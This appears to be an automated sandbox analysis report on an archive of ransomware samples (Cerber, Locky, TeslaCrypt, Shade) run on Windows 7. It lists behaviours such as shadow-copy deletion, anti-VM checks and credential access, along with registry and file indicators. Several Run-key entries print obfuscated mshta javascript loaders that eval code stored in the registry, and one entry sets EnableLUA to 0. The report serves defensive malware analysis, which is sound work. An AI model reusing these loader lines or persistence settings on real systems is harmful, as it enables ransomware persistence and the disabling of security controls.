Analysis Overview
SHA256
20b37ae125dc868f05fe28dad7206435d99baaf499f10ffa361bb071eeba1c02
Threat Level: Known bad
The file RNSM00272.7z was found to be: Known bad.
Malicious Activity Summary
Troldesh family
Teslacrypt family
UAC bypass
Troldesh, Shade, Encoder.858
Modiloader family
Cerber family
Locky family
ModiLoader, DBatLoader
TeslaCrypt, AlphaCrypt
Process spawned unexpected child process
Locky
Cerber
Checks for common network interception software
ModiLoader Second Stage
Looks for VirtualBox Guest Additions in registry
Looks for VirtualBox drivers on disk
Deletes shadow copies
Renames multiple (387) files with added filename extension
Adds policy Run key to start application
Contacts a large (755) amount of remote hosts
Looks for VMWare Tools registry key
Checks BIOS information in registry
Executes dropped EXE
Reads user/profile data of web browsers
Reads local data of messenger clients
Drops startup file
Uses the VBS compiler for execution
Loads dropped DLL
Checks whether UAC is enabled
Indicator Removal: File Deletion
Checks for any installed AV software in registry
Maps connected drives based on registry
Accesses Microsoft Outlook accounts
Adds Run key to start application
Command and Scripting Interpreter: PowerShell
Suspicious use of SetThreadContext
UPX packed file
Sets desktop wallpaper using registry
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
NSIS installer
Suspicious behavior: GetForegroundWindowSpam
System policy modification
Suspicious use of SetWindowsHookEx
Suspicious behavior: RenamesItself
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Kills process with taskkill
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Opens file in notepad (likely ransom note)
Modifies Control Panel
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-22 21:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-22 21:58
Reported
2024-11-22 22:02
Platform
win7-20240903-en
Max time kernel
208s
Max time network
209s
Command Line
Signatures
Cerber
Cerber family
Locky
Locky family
ModiLoader, DBatLoader
Modiloader family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\mshta.exe |
TeslaCrypt, AlphaCrypt
Teslacrypt family
Troldesh family
Troldesh, Shade, Encoder.858
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe | N/A |
Checks for common network interception software
Deletes shadow copies
Looks for VirtualBox Guest Additions in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Looks for VirtualBox drivers on disk
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys | C:\Windows\SysWOW64\regsvr32.exe | N/A |
ModiLoader Second Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Renames multiple (387) files with added filename extension
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:ZcCO3eYX3I=\"z\";yr65=new%20ActiveXObject(\"WScript.Shell\");xJ1uTTFD=\"rkT2TkEcx\";NnP7r1=yr65.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\397d13d44c\\\\dc778891\");wZd7mOs1Qg=\"sYbwa2qRbT\";eval(NnP7r1);tAMXMYIv40=\"vJm8fuzfG8\";" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Contacts a large (755) amount of remote hosts
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads local data of messenger clients
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\B9oBmLC = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\szyokvv.exe" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:CMhiIzj2=\"N2gPNFlND\";wg2=new%20ActiveXObject(\"WScript.Shell\");kqu4TuV=\"fQ\";laX5p=wg2.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\397d13d44c\\\\dc778891\");KPV13lZL=\"WM0m2athgE\";eval(laX5p);vjXphTMe7=\"8BfnMYUcP3\";" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:sL1Pukn=\"8YFE\";d1y0=new%20ActiveXObject(\"WScript.Shell\");Ga0wQCbao9=\"UKwFtny\";Oz3Ne3=d1y0.RegRead(\"HKCU\\\\software\\\\397d13d44c\\\\dc778891\");qqE3DZpr5j=\"E6tIV\";eval(Oz3Ne3);eGS3JqZi=\"19J086X\";" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updatedlogs = "C:\\Users\\Admin\\AppData\\Roaming\\Updatedlogs\\Updatedlogs.exe" | C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Updatedlogs = "C:\\Users\\Admin\\AppData\\Roaming\\Updatedlogs\\Updatedlogs.exe" | C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\gdegrfrrpghc = "C:\\Windows\\system32\\cmd.exe /c start \"\" \"C:\\Windows\\mbhvrmroopgk.exe\"" | C:\Windows\mbhvrmroopgk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe | N/A |
Checks for any installed AV software in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Avira\AntiVir PersonalEdition Classic | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir PersonalEdition Classic | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: File Deletion
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpF4CA.bmp" | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\-INSTRUCTION.bmp" | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\15.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\playlist\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\en-US\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\tt\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\css\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Notebook.jpg | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\images\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\More Games\fr-FR\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\lo\LC_MESSAGES\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\menu_style_default_Thumbnail.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\203x8subpicture.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\codec\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\css\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\co\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\he.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\gl\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\fr-FR\js\slideShow.js | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\da\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ja\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sk.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\reflect.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Passport.wmv | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\th\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\TextConv\fr-FR\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Triedit\fr-FR\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\css\currency.css | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_left.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_right.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_rest.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\az.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\he\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\gui\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Journal\fr-FR\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\cs\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mr.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\mbhvrmroopgk.exe | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe | N/A |
| File opened for modification | C:\Windows\mbhvrmroopgk.exe | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\PowerCfg | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Foreign.niji-e37766201ae534aa196d0afd8e9131f7f2b029aef9cbc5110c7666894c8dd6c6.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\WallpaperStyle = "0" | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b8d48fc8adfa6b4a805f1a4a681aaa6f000000000200000000001066000000010000200000005f0a67a2c9f39701c8efd6403353b04af78e3ecbc01e8393ba92234f381d05e7000000000e8000000002000020000000c20ddf0bfa13113d3ec77f08f508646a1ec63af5ed8afe180c072b9e101d2ee9900000003926a4c3b50707f611d8c06d50a0b780cc0b9f24a7aa44da76ed215008861cde4a67951e1adefa2538debe25d8fc15fd8eb72baa38dfde90b23743b8d5bc46bc4d01e11bf0c35e59460f72fd29fdb77f496924f2bf9bcbd883165ddd9baab5c7e883f57d4d692771fca9c2b6cd0348ede3c3494316a80b497de7e47814cf78b8a21a10602e298b4cbb233742dc548fad40000000d8ffc9a6ebb1c3d15049b58e83903818350d7e77bd19702fe2f4e352ddc08f1be827be275ac094a81002c3e66ec0811473036bf3841a4871af4c2a9ef1055b1d | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3CD20FC1-A91D-11EF-B578-7A9F8CACAEA3} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{50C3F521-A91D-11EF-B578-7A9F8CACAEA3} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
